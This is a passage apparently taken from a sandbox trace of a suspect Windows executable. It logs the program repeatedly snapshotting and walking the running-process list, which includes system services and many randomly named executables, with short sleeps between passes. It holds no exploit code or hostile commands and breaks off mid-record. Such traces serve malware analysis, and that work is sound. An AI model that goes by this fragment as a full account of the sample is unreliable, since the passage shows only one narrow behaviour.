th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0119.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0119.720] CloseHandle (hObject=0xbc) returned 1 [0119.720] Sleep (dwMilliseconds=0x12c) [0120.055] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0120.060] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0120.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0120.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0120.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0120.065] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0120.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0120.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0120.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.069] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0120.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0120.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.075] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0120.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0120.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0120.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0120.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0120.085] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0120.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0120.087] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0120.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0120.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0120.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0120.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0120.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0120.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0120.103] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0120.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0120.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0120.107] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0120.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0120.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0120.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0120.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0120.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0120.116] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0120.119] CloseHandle (hObject=0xc4) returned 1 [0120.119] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0120.125] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0120.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0120.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0120.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0120.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0120.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0120.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0120.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0120.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.186] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0120.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0120.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0120.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0120.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0120.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0120.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0120.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0120.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0120.205] Process32NextW (in: 